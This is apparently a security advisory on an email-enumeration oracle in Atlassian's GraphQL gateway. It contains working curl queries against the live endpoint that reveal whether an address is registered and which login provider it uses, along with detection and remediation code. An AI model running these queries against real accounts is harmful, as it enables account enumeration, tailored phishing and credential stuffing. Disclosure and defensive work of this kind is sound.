# CVE-2026-XXXX: Atlassian Central GraphQL — Email Enumeration Oracle
## Product
**Atlassian Central GraphQL Gateway** (`api.atlassian.com/graphql`)
## Vulnerability Type
**CWE-204: Observable Response Discrepancy** — Email Enumeration Oracle
## Severity
**MEDIUM** — CVSS 5.3 `AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
## Description
The `loomUnauthenticated_primaryAuthTypeForEmail` GraphQL query on Atlassian's central GraphQL gateway returns different responses depending on whether an email address is registered with Atlassian, allowing unauthenticated user enumeration.
- **Registered email** → returns `authType` (e.g. `workos`, `password`, `google`) and a redirect URI
- **Unregistered email** → returns `authType: "none"` with no redirect URI

No authentication is required. The query name includes "Unauthenticated", so it is intentionally public; that does not mean it should reveal whether an arbitrary email address has an Atlassian account.
## Affected Versions
- Atlassian Central GraphQL Gateway (snapshot 37157, build 2026-07-02)
- Endpoint: `https://api.atlassian.com/graphql`
## Proof of Concept
### Registered email (returns auth provider):
```bash
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'
```
Response:
```json
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "workos",
"hasActiveMemberships": false,
"redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
}
}
}
```
### Unregistered email (returns none):
```bash
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'
```
Response:
```json
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "none"
}
}
}
```
### Also leaks: email → auth provider mapping
`authType: "workos"` confirms that the email uses WorkOS SSO; `authType: "google"` or `authType: "password"` would likewise reveal the authentication method. This enables phishing tailored to the login provider the victim actually uses.
## Impact
An unauthenticated attacker can:
- Enumerate registered Atlassian/Loom accounts at scale
- Map emails to their authentication provider (Google SSO, WorkOS, password)
- Use auth provider information for targeted phishing campaigns
- Build lists of valid Atlassian users for credential stuffing
## Root Cause
The `loomUnauthenticated_primaryAuthTypeForEmail` query is not rate-limited and returns auth provider information for any email without authentication. The endpoint is intentionally unauthenticated because Loom's signup flow depends on it, but it leaks both whether an email has an account and which auth provider that account uses.
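Because the query is unauthenticated and unthrottled, the practical short-term control on the defender's side is to notice enumeration-style use of it in the gateway's access logs. The following is an added example (not Atlassian code) of such a detector: it assumes a log format of one JSON object per line with `ts` (epoch milliseconds), `src_ip`, `op` (the GraphQL field name) and `email_hash` (a hash of the email argument), and it flags any source that queries many distinct addresses inside a sliding time window. The sample log lines are constructed.

```javascript
// Added example, not Atlassian code: flag sources that call
// loomUnauthenticated_primaryAuthTypeForEmail for many distinct addresses
// within a short window. Log schema (ts, src_ip, op, email_hash) is assumed.

const TARGET_OP = "loomUnauthenticated_primaryAuthTypeForEmail";
const BASE_TS = 1782000000000; // constructed timestamp base (epoch ms)

// Helper to build constructed log lines in the assumed format.
function logLine(offsetMs, srcIp, emailHash, op = TARGET_OP) {
  return JSON.stringify({ ts: BASE_TS + offsetMs, src_ip: srcIp, op, email_hash: emailHash });
}

// Constructed sample: 203.0.113.9 probes six different addresses in 15 s,
// 198.51.100.4 makes two ordinary calls for the same address, one line is a
// different operation and one line is not JSON at all.
const SAMPLE_LOG = [
  logLine(0, "203.0.113.9", "h1"), logLine(3000, "203.0.113.9", "h2"),
  logLine(6000, "203.0.113.9", "h3"), logLine(9000, "203.0.113.9", "h4"),
  logLine(12000, "203.0.113.9", "h5"), logLine(15000, "203.0.113.9", "h6"),
  logLine(1000, "198.51.100.4", "h7"), logLine(40000, "198.51.100.4", "h7"),
  logLine(2000, "192.0.2.20", "h8", "someOtherQuery"),
  "this line is not JSON",
];

// Parse one line; malformed or incomplete records are skipped, not fatal.
function parseLogLine(line) {
  try {
    const rec = JSON.parse(line);
    if (typeof rec.ts !== "number" || typeof rec.src_ip !== "string" || typeof rec.op !== "string") return null;
    return rec;
  } catch (_) {
    return null;
  }
}

// For each source IP, slide a window of windowMs over its calls to the target
// operation and track how many distinct email hashes fall inside the window.
// Returns one alert per source whose peak distinct count reaches threshold.
function detectEnumeration(lines, { windowMs = 60000, threshold = 5, op = TARGET_OP } = {}) {
  const events = lines.map(parseLogLine)
    .filter((e) => e !== null && e.op === op)
    .sort((a, b) => a.ts - b.ts);

  const bySource = new Map();
  for (const e of events) {
    if (!bySource.has(e.src_ip)) bySource.set(e.src_ip, []);
    bySource.get(e.src_ip).push(e);
  }

  const alerts = [];
  for (const [src, evs] of bySource) {
    const inWindow = new Map(); // email_hash -> number of events inside the window
    let start = 0, peak = 0, peakTs = null;
    for (let end = 0; end < evs.length; end++) {
      const h = evs[end].email_hash;
      inWindow.set(h, (inWindow.get(h) || 0) + 1);
      // Evict events that are older than windowMs relative to evs[end].
      while (evs[end].ts - evs[start].ts > windowMs) {
        const old = evs[start].email_hash;
        const c = inWindow.get(old) - 1;
        if (c === 0) inWindow.delete(old); else inWindow.set(old, c);
        start++;
      }
      if (inWindow.size > peak) { peak = inWindow.size; peakTs = evs[end].ts; }
    }
    if (peak >= threshold) alerts.push({ src_ip: src, distinctEmails: peak, ts: peakTs });
  }
  return alerts;
}

console.log(detectEnumeration(SAMPLE_LOG));
```

Counting distinct addresses rather than raw request volume keeps a legitimate user who retries the same address a few times below the threshold, while a source working through a list trips it; the window and threshold are tuning knobs, and the hash field exists so that the detector never needs the raw addresses.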
## Remediation
1. Add rate-limiting to prevent bulk enumeration
2. Return a consistent response for both registered and unregistered emails
3. Alternatively, require a CAPTCHA or nonce before the email status can be queried
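The following is an added example, not Atlassian or Loom code, of what those three remediations look like in a resolver. It models the query as plain functions rather than a real GraphQL server: `vulnerableResolver` reproduces the discrepancy the advisory describes, and `createHardenedEndpoint` applies a per-client token bucket (remediation 1), an address-independent reply (remediation 2) and a single-use nonce issued by a separate step where a CAPTCHA would be verified (remediation 3). The account directory, hostnames, error codes, `ctx` fields and nonce format are all constructed for the example; `isEnumerationOracle` is the check a reviewer can run against either form.

```javascript
// Added example, not Atlassian/Loom code: the oracle form of the resolver
// beside a hardened form. All names, hosts and error codes are constructed.

// Constructed identity store.
const ACCOUNTS = new Map([
  ["alice@example.com", { authType: "workos", hasActiveMemberships: false }],
  ["bob@example.com", { authType: "password", hasActiveMemberships: true }],
]);

// Oracle form: shape and content of the reply depend on registration status,
// which is the CWE-204 discrepancy described above.
function vulnerableResolver({ email }) {
  const account = ACCOUNTS.get(email.toLowerCase());
  if (!account) return { authType: "none" };
  return {
    authType: account.authType,
    hasActiveMemberships: account.hasActiveMemberships,
    redirectUri: `https://login.example/auth/${account.authType}?email=${encodeURIComponent(email)}`,
  };
}

// Remediation 1: token bucket per client key, refilled continuously.
class TokenBucket {
  constructor(capacity, refillPerSecond) {
    this.capacity = capacity;
    this.refillPerSecond = refillPerSecond;
    this.buckets = new Map(); // key -> { tokens, lastMs }
  }
  allow(key, nowMs) {
    let b = this.buckets.get(key);
    if (!b) { b = { tokens: this.capacity, lastMs: nowMs }; this.buckets.set(key, b); }
    b.tokens = Math.min(this.capacity, b.tokens + ((nowMs - b.lastMs) / 1000) * this.refillPerSecond);
    b.lastMs = nowMs;
    if (b.tokens < 1) return false;
    b.tokens -= 1;
    return true;
  }
}

// Hardened form. The reply is identical for every address (remediation 2), so
// provider-specific routing has to move to a later step that first proves
// control of the mailbox; the nonce stands in for a CAPTCHA token (remediation 3).
function createHardenedEndpoint({ burst = 5, refillPerMinute = 5, nonceTtlMs = 60000 } = {}) {
  const limiter = new TokenBucket(burst, refillPerMinute / 60);
  const nonces = new Map(); // nonce -> { clientIp, expiresMs }
  let counter = 0;

  function issueNonce(clientIp, nowMs) {
    const nonce = `nonce-${++counter}`; // sequential only for the example; use a CSPRNG value in practice
    nonces.set(nonce, { clientIp, expiresMs: nowMs + nonceTtlMs });
    return nonce;
  }

  function consumeNonce(nonce, clientIp, nowMs) {
    const rec = nonces.get(nonce);
    nonces.delete(nonce); // single use, whether or not it validates
    return rec !== undefined && rec.clientIp === clientIp && rec.expiresMs > nowMs;
  }

  function resolve({ email, nonce }, ctx) {
    if (typeof email !== "string") throw new Error("BAD_REQUEST");
    if (!limiter.allow(ctx.clientIp, ctx.nowMs)) throw new Error("RATE_LIMITED");
    if (!consumeNonce(nonce, ctx.clientIp, ctx.nowMs)) throw new Error("INVALID_NONCE");
    // Registration status is deliberately not consulted here, so neither the
    // reply nor the work done can differ between registered and unregistered addresses.
    return {
      authType: "continue",
      hasActiveMemberships: null,
      redirectUri: `https://login.example/continue?email=${encodeURIComponent(email)}`,
    };
  }

  return { issueNonce, resolve };
}

// Oracle check for either form: call the resolver for a registered and an
// unregistered address, mask the address out of each reply and compare.
// true means a caller can tell the two cases apart.
function isEnumerationOracle(resolverFn, registeredEmail, unregisteredEmail) {
  const masked = (email, reply) =>
    JSON.stringify(reply)
      .split(encodeURIComponent(email)).join("<email>")
      .split(email).join("<email>");
  const a = masked(registeredEmail, resolverFn(registeredEmail));
  const b = masked(unregisteredEmail, resolverFn(unregisteredEmail));
  return a !== b;
}

console.log("vulnerable form is an oracle:",
  isEnumerationOracle((e) => vulnerableResolver({ email: e }), "alice@example.com", "nobody@example.com"));
```

Two details matter beyond the code: the hardened resolver skips the directory lookup entirely so that response time does not become a second oracle once the response body is uniform, and the rate limit is keyed by client, which only helps if the gateway derives that key from something the caller cannot freely rotate.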
## What This Is NOT
After thorough testing, the following claims were **invalidated**:
- ❌ No JWT token with privileges (tokens have `aaid: "unidentified"`)
- ❌ No admin mutation execution (all fail with `ValidationError`)
- ❌ No authentication bypass (gateway correctly identifies caller as `unidentified`)
- ❌ No data leakage beyond email/auth-provider mapping
## Timeline
- **2026-06-30:** Discovered
- **2026-06-30:** Reported to [email protected]
- **2026-07-02:** Corrected assessment — downgraded from Critical (9.8) to Medium (5.3)
## Discovered By
Wh4l3XData